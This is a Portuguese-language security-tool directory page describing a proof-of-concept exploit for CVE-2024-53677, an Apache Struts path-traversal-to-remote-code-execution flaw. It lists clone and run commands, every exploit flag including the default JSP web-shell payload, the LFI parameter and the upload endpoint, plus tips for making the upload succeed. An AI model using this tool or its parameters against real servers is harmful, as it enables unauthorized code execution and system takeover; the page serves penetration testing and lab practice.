Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-53677-POC — a proof of concept of CVE-2024-53677 | Kitploit
Ferramentas/GitHubGitHub/cythonic1/cve-2024-53677-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubcythonic1/cve-2024-53677-poc

CVE-2024-53677-POC

a proof of concept of CVE-2024-53677

Ver Repositório
1há 11 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-53677

Uma vulnerabilidade antiga e amigável que afeta Apache Struts, levando a LFI e execução remota.

Mais informações sobre a vulnerabilidade podem ser encontradas neste ótimo blog.

Apache Struts path traversal → RCE (CVE-2024-53677)

Uso do PoC

Passei muito tempo tornando isso o mais personalizável possível, porque quando encontrei esta CVE pela primeira vez, não encontrei uma boa fonte que a implementasse corretamente. A maioria das flags tem valores padrão, então não se desencoraje com tantas flags.

root@kitploit:~
git clone https://github.com/Cythonic1/CVE-2024-53677-POC
cd  CVE-2024-53677-POC
go run . -h
root@kitploit:~

  -command string
        command to execute on the server default: whoami
  -end-point string
        post endpoint default to: upload.action
  -file-location string
        where to save the file into the server default: what test function return
  -lfi-param string
        Parameter name for LFI testing default: top.UploadFileName
  -payload-file string
        Path to the payload file default: ./shell.jsp
  -payload-file-name string
        name of the payload it self default: shell.jsp
  -payload-param string
        Parameter name for payload injection default: Upload
  -test-file-name string
        name of the testfile it self default: testfile.txt
  -testing-file string
        File used for testing default: ./testfile.txt
  -url string
        Target base URL (format http://strutted.htb/) do not forgot the [/] at the end

Todos esses comandos têm valores padrão. Também implementei uma função de teste para verificar onde o arquivo deve ser colocado, e é uma opção configurável pelo usuário.

Uso básico

root@kitploit:~
go run .  -url http://127.0.0.1:8080/ -end-point upload.action

NOTAS.

Algumas coisas a notar.

  1. O payload padrão está no formato GIF e o tipo de conteúdo é GIF. Se precisar ser alterado, esta é a única opção onde você terá que modificar o código.
  2. A função de teste pode produzir suposições erradas, portanto, não confie 100% nela.
  3. Você pode precisar executar o exploit mais de uma vez, pelo menos duas, porque notei que quando o payload é carregado pela primeira vez, ele não é encontrado na requisição seguinte. Portanto, tenha isso em mente.

Contribuições.

Sinta-se à vontade para modificar ou adicionar ao exploit ♥️.

Recursos.

Vulnerable docker image more info about the exploit

Baixar ferramenta